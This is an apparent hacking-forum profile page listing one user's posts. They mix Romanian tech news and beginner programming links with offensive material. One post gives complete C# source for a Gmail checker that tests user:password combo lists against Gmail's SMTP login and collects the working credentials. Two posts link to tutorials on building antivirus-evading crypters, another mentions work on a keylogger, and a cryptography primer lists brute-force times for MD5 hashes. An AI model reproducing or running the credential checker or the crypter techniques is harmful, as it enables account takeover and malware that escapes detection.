Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18711

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro
    Download: http://rapidshare.com/files/271363684/Injection_Helper_v2.rar
  2. Nytro
    Win32 Assembly Tutorials http://win32assembly.online.fr/tutorials.html
  3. Nytro
    Ratati... Cred ca aveti nevoie de un ban...
  4. Nytro
    Windows 7 RC, indisponibil dupa 20 august de Mina Hutterer | 19 august 2009 Microsoft a trimis deja in productie Windows 7 si considera ca utilizatorii si-au facut deja o idee despre noul sistem de operare. Prin urmare, compania a decis ca incepand de maine, 20 august 2009, utilizatorii sa poate in continuare sa inregistreze produsul si sa obtina registration keys, dar nu si sa descarce clientul propriu-zis. Aceasta stire vine in conditiile in care lansarea mondiala programata pentru finele lui octombrie 2009 se apropie rapid, iar varianta finala a "scapat" deja in versiune OEM printr-o neatentie a firmei Lenovo. Windows 7 este primul sistem de operare Microsoft de la Windows XP care a fost primit pozitiv de catre utilizatorii care au evitat Windows Vista, in conditiile in care va reprezenta si o platforma importanta pentru jocurile next-gen, prin implementarea API-ului DirectX 11.
  5. Nytro
    Microsoft nu e impresionata de miliardul lui Firefox de Mina Hutterer | 17 august 2009 Mozilla s-a laudat ca a atins pragul de un miliard de descarcari pentru Firefox, lucru care i-a incantat pe numerosii fani ai browser-ului. Cu toate acestea, ziarul The Guardian din Anglia a discutat intr-un interviu cu unul dintre managerii Microsoft care are in grija browser-rul Interet Explorer, Amy Barzdukas. Pentru acesta, anuntul ca s-au inregistrat 1 miliard de descarcari ale lui Firefox este doar un caz de "matematica interesanta". "Este o cifra interesanta si n-am vazut calculele prin care s-a ajuns la ea, dar cati utilizatori sunt conectati la Internet ? 1,1 miliarde, 1,5 miliarde, ceva de genul acesta", a spus Barzdukas. Cifra de un miliard de download-uri anuntata de Mozilla include nu doar browser-ul propriu-zis, ci si fiecare update in parte lansat de la aparitia lui Firefox in 2004.
  6. Nytro
    Amazon, Microsoft si Yahoo se aliaza iar impotriva Google de Vlad Matei | 22 august 2009 Amazon, Microsoft si Yahoo au creat o coalitie numita "Open Book Alliance" in incercarea de a opri planurile gigantului Google, care intentioneaza sa creeze cea mai mare biblioteca virtuala din lume, informeaza presa de specialitate. Cei trei giganti, carora li s-au alaturat biblioteci si asociatii de editori din SUA si Europa, se opun unei intelegeri amiabile care ar putea face din Google sursa principala de carti scanate. "Google incearca sa monopolizeze sistemul bibliotecilor digitale. Daca intelegerea va functiona, vor da lovitura, devenind <biblioteca, singura biblioteca digitala>", a declarat Brewster Kahle, fondatorul Archivei de pe Internet. Totul a pornit in 2008, cand compania care a creat imensul motor de cautare a ajuns la o intelegere cu editorii si autorii in privinta a doua procese care acuzau compania de incalcarea drepturilor de autor pentru scanarea neautorizata a cartilor. In aceasta intelegere, Google a fost de acord sa plateasca 125 milioane de dolari pentru a crea un Registru al Drepturilor Cartii, in care autorii si editorii isi pot inregistra operele, urmand sa primeasca 70% din vanzarea lor, companiei Google revenindu-i 30% din castiguri. Google ar fi primit si dreptul de a digitaliza carti carora nu li se cunoaste autorul. Volumele de acest tip, pentru care nu poate pretinde nimeni drepturi de autor, se estimeaza ca reprezinta 50-70% dintre cartile publicate dupa 1923. Intelegerea Google cu editorii si autorii ar trebui sa trebui sa fie parafata pana pe 4 septembrie. Arhiva pentru Internet scaneaza 1000 carti zilnic, la pretul de 30 centi pagina. Aceasta formatiune non-profit s-a opus, de multa vreme, acestei intelegeri dintre Google, editori si autori. Avocatul aliantei nou-create este Gary Reback, cel care a convins Departamentul de Justitie din SUA sa demareze o ancheta asupra practicilor non-concurentiale ale Microsoft, in anii 90. Conform datelor furnizate de compania de cercetare ComScore Inc, Google domina in iunie aproximativ 65% din piata motoarelor de cautare. Impreuna, Microsoft si Yahoo abia acopereau 28%. Sursa: Newsin
  7. Nytro
    Computerele retelei de hoteluri Radisson au fost sparte de Mina Hutterer | 21 august 2009 Hackerii au obtinut informatii despre cartile de credit ale clientilor mai multor hoteluri Radisson din SUA si Canada. Atacurile au avut loc intre lunile noiembrie 2008 si mai anul acesta, dar abia acum Radisson a decis sa le comunice clientilor ca datele despre card-urile lor este posibil sa fi fost furate. Radisson a mai declarat ca lucreaza impreuna cu fortele federale pentru a descoperi faptasii. Iata declaratia integrala Radisson: "Radisson priveste cu seriozitate siguranta dumneavoastra si respecta caracterul privat al informatiilor dumneavoastra, motiv pentru care dorim sa va informam ca intre noiembrie 2008 si mai 2009, computerele unora dintre hotelurile Radisson din SUA si Canada au fost accesate fara autorizatie. Accesul neautorizat contravine legilor civile si penale. Radisson si-a coordonat eforuturile cu fortele federale pentru a contribui la investigarea acestui incident. Desi numarul de hoteluri care este posibil sa fi fost afectate este limitat, datele accesate pot include informatii personale ale clientilor, cum sunt numele imprimat pe cartea de credit sau debit a clientului, numarul cartii de credit sau debit si/sau data expirarii cardului." Radisson si-a indemnat toti clientii sa verifice starea conturilor pentru a vedea daca lipseste ceva.
  8. Nytro
    Primul centru de reabilitare a dependentilor de internet de Vlad Matei | 21 august 2009 Prima institutie de reabilitare a dependentilor de internet se va deschide in curand intr-un parc de cinci hectare, la doar cativa km de campusul Microsoft, iar tratamentul in acest centru va costa 14.500 de dolari, informeaza presa de specialitate. Responsabilul institutiei de reabilitare a dependentei legate de mediul online spun ca misiunea centrului este aceea de a-i reconecta la realitate pe tinerii care petrec multe ore pe zi in fata calculatorului. Tratamentul se desfasoara timp de sase saptamani, iar care pacientii sunt tinuti departe de jocurile video si sunt supusi unor programe de relaxare prin sport in aer liber. Tot aici se incearca obisnuirea pacientilor cu un stil de viata sanatos. De asemenea, dependentii de internet mai beneficiaza de consiliere profesionala si psihologica. Taxa de 14.500 de dolari pentru tratamentul oferit de clinica nu este suportata de asigurarea de sanatate. In momentul de fata nu se cunosc tratamente specifice pentru dependenta de internet, pentru ca si cunostintele medicale in domeniu sunt extrem de limitate. Saptamana aceasta, cel mai recent studiu dedicat adultilor dependenti de internet a incercat sa aduca noi lamuriri cu privire la afectiunile dependentilor de internet. Cele mai multe persoane care sufera de dependenta de mediul virtual par a fi supraponderalii si deprimatii. Autorii studiului au recunoscut ca sunt incapabili sa dovedeasca un veritabil raport de cauzalitate intre jocurile video si comportamentul de care dau dovada majoritatea dependentilor de internet. In Olanda si Belgia, dependenta de internet este tratata din 2006 in institutii specializate, iar in Franta exista un centru de reabilitare a dependentilor de jocuri video si internet, infiintat la sfarsitul anului trecut in orasul Nantes, din vestul Frantei. Acest gen de dependenta "este o problema de sanatate publica prea putin luata in considerare in prezent" explica reprezentantul centrului de la Nantes Cristelle Andress la inaugurarea institutiei. Centrele de reabilitare a dependentilor de internet din China au fost luate in vizor de autoritati si de presa din intreaga lume dupa ce au avut loc mai multe abuzuri asupra unor tineri, care s-au soldat cu decesul unui adolescent si spitalizarea unui copil de 14 ani. Adolescentul a fost adus in stare grava la spital dupa ce a fost batut intr-o tabara de reabilitare a dependentilor de internet din sud-est-ul Chinei, in incercarea de a-l dezvata de obiceiul navigarii online, informa, miercuri, AFP, citand China Daily. Incidentul a avut loc la doar cateva saptamani dupa ce un alt adolescent a fost ucis in bataie intr-o tabara de acelasi gen din sudul tarii. Potrivit unui studiu realizat anul trecut de Asociatia de internet a tinerilor chinezi, peste 10 din 100 de milioane de adolescenti chinezi sunt dependenti de internet, iar in toata tara sunt aproximativ 400 de centre de reabilitare pentru acest gen de "afectiune". Luna trecuta, ministrul Sanatatii din China a interzis folosirea electrosocurilor in tratamentul dependentei de internet. Expertii medicali chinezi au pledat pentru adoptarea unor legi si reglementari specifice, care sa supervizeze activitatea taberelor unde parinti isi trimit copiii pentru a-i tine departe de computere si de internet. Sursa: Newsin
  9. Nytro
    Pirate Bay se poate... pirata de Mina Hutterer | 18 august 2009 21,3 GB - atat are faimosul sit de torrents, aflat acum pe punctul sa-si schimbe proprietarii, motiv pentru care fanii au devenit extrem de ingrijorati ca vor ramane fara sursa lor de torente cea de toate zilele. Desi nu foarte lume are capacitatea hardware de a rula un sit atat de mare, totusi doritorii pot sa faca un "back up" cu cei 21,3 GB de date, inclusiv o arhiva a tuturor celor 873.671 de fisiere torrent pastrate pe serverele Pirate Bay. Utilizatorul care a compilat index-ul si apoi l-a upload-at spune ca a facut acest lucru pentru ca este ingrijorat ca torentele vor disparea dupa ce Pirate Bay intra pe mainile noilor proprietari.
  10. Nytro
    There isn't any source code, there is the executable decompiled...
  11. Nytro
    Author: steve10120 Description: Flash tutorial showing how to make a scantime undetectable crypter in visual basic Download: http://hackhound.org/forum/link.php?link=http://hhdownloads.com/tutorials/ScanTime_Crypter_Tutorial.rar
  12. Nytro
    by skyweb07: Well guys it seems there are many people who would like to learn how to create your own Crypter, because today I bring you the solution, it is a Videotutorial who just finished explaining in detail how to create a Visual Basic Runtime Crypter. As many will know my English is rather poor in regard to the words so I tried to explain as much as possible and discuss all the lines of the video ... In the coming RAR + Video Project already done everything, but I advise you to look at the video and to understand better what they do if they see it ... Well I hope you like it a lot and leave comments ... Greetings to all and sorry if the video committed a misspelling: p .. My English is shit: P Download: http://hackhound.org/forum/link.php?link=http://www.exponelo.com/files/0LERU6QM/RunTime.rar Nu l-am vazut, m-am uitat prin el, si am vazut multe comentarii, cred ca e bine explicat.
  13. Nytro
    Download: https://h30406.www3.hp.com/campaigns/2008/wwcampaign/1-57C4K/images/Scrawlr.msi
  14. Nytro
    Paperback: 384 pages Publisher: Wiley (March 3, 2009) Language: English ISBN-10: 0470395362 ISBN-13: 978-0470395363 Format: PDF Description: As more and more vulnerabilities are found in the Mac OS X (Leopard) operating system, security researchers are realizing the importance of developing proof-of-concept exploits for those vulnerabilities. This unique tome is the first book to uncover the flaws in the Mac OS X operating system—and how to deal with them. Written by two white hat hackers, this book is aimed at making vital information known so that you can find ways to secure your Mac OS X systems, and examines the sorts of attacks that are prevented by Leopard’s security defenses, what attacks aren’t, and how to best handle those weaknesses. Download: http://www.file2box.com/lhyw91twhf0l
  15. Nytro
    Paperback: 288 pages Publisher: Wiley (March 23, 2009) Language: English ISBN-10: 0470478365 ISBN-13: 978-0470478363 Format: PDF Description: Explore a ton of powerful Mac OS X UNIX commands This handy, compact guide teaches you to use Mac OS X UNIX systems as the experts do: from the command line. Try out more than 1,000 commands to find and get software, monitor system health and security, and access network resources. Apply the skills you learn from this book to troubleshoot networks, lock down security, and uncover almost anything you care to know about your Mac OS X system. Expand your Mac OS X UNIX expertise in these and other areas: - Using the shell - Finding online software - Working with files - Playing with music and images - Administering file systems - Backing up data - Checking and managing running processes - Accessing network resources - Handling remote system administration - Locking down security Download: http://www.file2box.com/a9vllqzqbigt
  16. Nytro
    using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using System.Net.Mail; using System.Net; using System.Collections; using System.IO; namespace GMailCheck { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void button1_Click(object sender, EventArgs e) { try { if(textBox1.Text == "") MessageBox.Show("list is empty"); ArrayList mails = new ArrayList(textBox1.Text.Split('\n')); //seperate them by new lines for (int i = 0; i < mails.Count; i++) { ArrayList mailInfo = new ArrayList(mails[i].ToString().Split(':')); if (!mailInfo[0].ToString().EndsWith("@gmail.com")) mailInfo[0] = mailInfo[0] + "@gmail.com"; if (checkAccount(mailInfo[0].ToString(), mailInfo[1].ToString())) { textBox2.Text += mailInfo[0].ToString() + ":" + mailInfo[1].ToString() + "\r\n"; } } } catch (Exception ex) { MessageBox.Show(ex.Message); } } static bool checkAccount(string username, string password) { //we use fake emails so nobody recieves the email, if you want a email when //the correct login is found, supply your email address MailMessage msg = new MailMessage(); msg.From = new MailAddress("Wefwqefwef@sdfsddf.com");//fake email msg.To.Add("Asfasdf@ssdfs.com");//fake email msg.Subject = "test"; msg.Body = "test"; SmtpClient smtp = new SmtpClient("smtp.gmail.com"); smtp.Credentials = new NetworkCredential(username, password); smtp.EnableSsl = true; try { smtp.Send(msg); return true; } catch(Exception ex) { return false; } } private void button2_Click(object sender, EventArgs e) { try { openFileDialog1.ShowDialog(); StreamReader read = new StreamReader(openFileDialog1.FileName); while (!read.EndOfStream) { textBox1.Text += read.ReadLine() + "\r\n"; } } catch (Exception ex) { MessageBox.Show(ex.Message); } } } } Credits: sunjester
  17. Nytro
    Cititi si voi asta oameni buni:
  18. Nytro
    "designeri php" - Interesant... Trebuia sa postezi la Gunoi. Dar am mutat eu
  19. Nytro

    Programming Tools

    Nytro replied to Nytro's topic in Programare

    Poti, dar vezi sa nu ii strici structura, adica sa nu incepi sa stergi caractere de acolo.
  20. Nytro

    Iframe VB6

    Nytro replied to djricky's topic in Programare

    CTRL + T, bifezi Microsoft Internet Controls, Apply, Ok. Iti apare un glob in Toolbox, il dersenezi pe Form, si ca sa intri pe site: WebBrowser1.Navigate "http://www.google.ro/"
  21. Nytro
    Eroarea e de la CSocketMaster, o clasa pentru inlocuirea mswinsck-ului. PS: Cred ca ma reapuc de Digital Keylogger v4.0.
  22. Nytro
    Tier One: Introduction to Visual C++ 2008 Express Edition This introductory video covers the main features of the Visual C++ 2008 Express Edition and walks you through some of the most common tasks you’ll be doing as you create your programs. By the end of this video, you’ll be more familiar with the development environment and able to get started creating your first application. Some of the topics covered in this video are: Setup Creating a Project Project Files and the Development Environment Writing C++ code Debugging Compiling Managing files and Setting Options Where to go from here Duration: 34 minutes, 46 seconds Video: http://msdn.microsoft.com/en-us/beginner/bb964629.aspx
  23. Nytro
    Tier One: Introduction to Visual Basic 2008 Express Edition This introductory video covers the main features of the Visual Basic 2008 Express Edition, and walks you through some of the most common tasks you’ll be doing as you create your programs. By the end of this video, you’ll be more familiar with the development environment and able to get started creating your first application. Some of the topics covered in this video are: Setup Creating a Project The Windows Form Designer Writing Visual Basic code Compiling, Running and Saving your project Errors and Debugging Project Files, Properties and Customization Data Where to go from here Duration: 36 minutes, 26 seconds Video: http://msdn.microsoft.com/ro-ro/beginner/bb964633(en-us).aspx
  24. Nytro
    Nu folosesc nici unul. Daca chiar am nevoie de unul imi fac singur ( modific Royalu ). Dar nu ma ocup cu astfel de prostii.
  25. Nytro
    Hi, this is a guide about the basics of encryption and all that stuff. I am not an expert in this, I don't know much and as I said, this is only a basic introduction to cryptology in general. First, we need to define what's cryptology and what cryptography. Cryptology is the study of cryptography. Cryptography is the process/skill of encrypting /decrypting ciphers. They are not the same thing. Easy enough. But it's way more complicated than it sounds. There are over 10k encryption methods, each of them different and unique. Some are obsolete, some are damn hard to crack, some are irreversable. As time passes and the decrypters' brain evolves, day by day encryptions are becoming obsolete. But then again, at the same time, the encrypters' brain evolves as well. Stupid example, I know. I'm sure you've heard of md5 (Message Digest algorithm 5, will explain about it later), some consider it uncrackable, irreversable etc. An algorithm created for encrypting sensitive data, such as passwords in a database. Slowly, more and more weaknesses are found in md5 and it's becoming obsolete, so experts started recommending SHA1. (it's slower, and personally I wouldn't recommend it. But, I'm not an expert, what can I say) Enough about md5, let's get back to cryptography in general. Cipher(Cypher) is an algorithm for performing encryption. Encryption has had a major role in history. Key components of an encryption are plaintext (your word, call it whatever you like) and a key (password) that are put through a reversable process named algorithm. The result is ciphertext, which is usually a string which makes no sense whatsoever. There are two methods of cryptography, transposition and substitution. Transposition is where numbers, letters and characters are the same but with different positions. Substitution is where they're replaced with new ones. There are two main types of cryptography, asymmetric and symmetric (also known as public and private keys). I'll explain about those later. All encryption is about, is security. To know if your encryption system is secure, you need to know the vulnerabilities and holes of the previous encryption systems. Encryption systems can be insecure in several ways. One of them being your algorithm being too simple, or the most common weakness in cryptosystems, limited number of possible keys. An attacker can crack it by trying every possible combination there is. Such an attack is known as brute-force. -=[Attack types]=- 1. Bruteforcing: Probably the simpliest way, where the attacker guesses every possible combination till he gets a plaintext result, assuming that the attacker has the key and sufficient resources. 2. Rainbow Table: I don't know much about this. It's the fastest method to use, but it takes some time to create the table and sort it. Rainbow table attack is something like bruteforcing, but in this case, we trade memory for speed. Would compare it with process forking (uhm, don't judge me). 3. Dictionary Attack: All you need is a wordlist with common passwords. This is why I do not recommend using common words as passwords, it's easy to crack. Basically, every word on the wordlist is encrypted till you get a matching hash. -=[The difference between encrypting, encoding and hashes]=- 1. Encryption: The most common of all. Simple, a plaintext and a key are put through an algorithm to produce a ciphertext. Encryptions are reversable, everyone with the ciphertext, key and algorithm can produce the plaintext. Encrypting a plaintext with a different key will result in a different ciphertext, as well as encrypting different messages will result in different ciphertext. 2. Encoding: Almost the same as encryption, except that the key is missing. A plaintext is put through an algorithm, and you get a ciphertext. It's the least used of all three. The key is the MOST important thing. This is not used for security. An example would be mp3 encoding. Your mp3 player decodes the bits and produces the appropriate sound. 3. Hashes: The most complicated of all. Due to the fact that hashes are of a finite size and there is an infinite number of strings you could input into the algorithm there are an infinite number of strings that could produce the same hash. There is not only one possible result and different plaintexts can and will produce the same result, these are called 'collisions'. Hashes are irreversable, with or without the algorithm, there is no way to reverse it. For example, passwords in vBulletin are encrypted in md5. How does the forum know that it's the true password then? It doesn't. As soon as you enter it, it's encrypted in md5, and the forum reads the md5, not the plaintext. As I said, every plaintext will result in it's own hash. When you enter the password, it compares the md5 hash to the one stored in the database. It doesn't have to be the same password as you're using, as long as the ciphertext matches (read above, collision). -=[Examples]=- All ciphertexts are encryptions, encodings or hashes of the word uNkn0wn. 1. MD5: There's a whole paragraph on MD5 later in this article. 5b65e9d92c14d3ca940c7c57db1c19d0 - uNkn0wn dd0896ca696f7d2d50b94aeb1c896a1f - unkn0wn.(case sensitive) 2. Base64: I don't know how to explain it. Base64 is just an encoding algorithm, not an encryption algorithm, it's main use is to send binaries via email and usenet, it turns crazy ASCII codes that you have in binaries into normal text, so it's in a form that can be transmitted via email. Don't expect it to provide any form of security. dU5rbjB3bg== - uNkn0wn. 3. Binary: Made of 1s and 0s in groups of eight. 01110101 01001110 01101011 01101110 00110000 01110111 01101110 - uNkn0wn. 4. Hex: Letters A-Z and numbers 0-9 together. This is not an encryption. Not going to talk about it. 75 4e 6b 6e 30 77 6e 65 64 - uNkn0wn (this is the web way of hex, the "correct" would be 0x75 0x4e 0x6e etc) 5. ROT13: Rotates 13 letters backwards. haxa0ja - uNkn0wn. 6. DES: Data Encryption Standard. Kinda insecure now a days. 56-bit values based on Data Encryption Algorithm. CRJ4GGqMoYx1w - uNkn0wn. 7. SHA1: Sort of like MD5, just with a 160-bit value. 45E252668E0B735E697B1DC21139EE6A3C9CB391 - uNkn0wn. FD11CE37EDC92D41D990AE666EAC00F1EAE8AD7C - unkn0wn. (case sensitive) 8. WHIRLPOOL: Cryptographic hash function that given a message less than 2256 bits in length, it returns a 512-bit message digest represented as 128-digit hexadecimal numbers. Like SHA and MD5, a single character change in the plaintext will result in a completely different cipher. 202DD91B4F1FE7F42388371F91CEE6180B3A1111ACD1167B296CADF3F016D759 8BD93A6211666EDD577F9CF9F25D473215A7E6D69CA7D53EC1ADCB1BF65E3800 - uNkn0wn (it's long) That would be enough encryptions/encodings/hashes for now. -=[MD5 - Message Digest Algorithm 5]=- The famous MD5, widely used. Most people consider it irreversable, but no encryption method is irreversable. Well, sorta. Once you encrypt something in md5 you can't get it back the same way you encrypted it. Attack types explained above. MD5 hashes are used for encrypting sensitive data, as well as a digital signature. If anything is changed, including case, the whole hash twists. The only known way to crack an MD5, is collision (read bruteforcing and dictionary attacks) where a number of possible passwords are encrypted and compared with the MD5 hash being cracked. A MD5 hash will always be 32 characters in length (128-bit value) and only consists of the characters (charset) a-f and 0-9 (hex). When bruteforcing an MD5 hash, we need to define a charset and possible length which we believe the plaintext would be. But keep in mind that using a wordlist is much faster than bruteforcing since there is a set number of hashes possible. The larger the wordlist is, the higher the chance of cracking the hash is, but it will also take longer. For a more successful attack, you can try capitalizing the words, reversing order, adding chars etc etc. MD5 is becoming easier and easier to crack, which means that a new, more secure method of encryption would be needed. A salt is made up of random bits that are used as inputs to a KDF. Think of it like this, if a user's key is stolen and he is known to have a pass of an english word. Because of the salt, pre-calculated hashes have no value. So this increases the amount of hashes that have to be computed from 200,000 to 800 trillion. Salt should always be applied, no matter the security of the algorithm. Any md5 hash is vulnerable to BF/Rainbow tables unless the hash incorporates a salt, (MySQL MD5 encryption does not use salts which really makes it easy to crack) If someone was to gain access to the database .. Average timetables for BF attacks on MD5 would be something like this Note: the 1,8 means testing all possible passwords 1-8 chars in length.. (if the forum requires say 4 letters min then they would do 4-8 cutting the time in basically half) 8 Chars [a-zA-Z0-9]{1,8} ... about 497 days [a-z0-9]{1,8} ...... about 6 days [a-zA-Z]{1,8} ...... about 6 days [A-Z0-9]{1,8} ...... about 6 days -=[symetric/Asymmetric Keys]=- One of the main components of an encryption is the key. In all cases, we must assume that the attacker has the cryptographic algorithm and the ciphertext. It's just a matter of time before he cracks it. In order to prevent him from getting the plaintext, we use keys. How does this work, well...keys are simply just small pieces of data, metadata even, that will keep the information safe. In other words, this is just a password. Anyone with the key and the algorithm can get the plaintext. There's public and private keys, symetric and asymmetric. I'll explain the difference in short, when our algorithm uses one key for both encryption and decryption, then we got a symetric key. When we have an encryption which uses a different key for encrypting and a different key for decrypting, this is asymmetric. Let's see how it would look in the "real" world. User A encrypts a message using a public key. Message is sent to user B in an encrypted form. User B has the private key, only he can decrypt it. Everyone can encrypt using the public key, only you can decrypt it using the private key. In some cases, you will need to fetch the private key from your targets. This is the part where social engineering comes in handy. Another example would be a mailbox. Everyone can leave a letter, only you can unlock the mailbox and read it. There's plenty of keys used around, one of the most used being RSA which includes both public and private key. Keys should be random nonsense for security. Usually KDF (key derivation function) is used in this case which adds a salt and compresses the key to a fixed length. This is used for digital signatures as well. Conclusion tip: Never use a password which can be found in the dictionary. Thank you. I hope you enjoyed this article, even though I doubt it. It's for educational purposes. Please let me know if you see any grammatical errors. Or, let me know if I missed punctuation somewhere. ~FxM
×
×
  • Create New...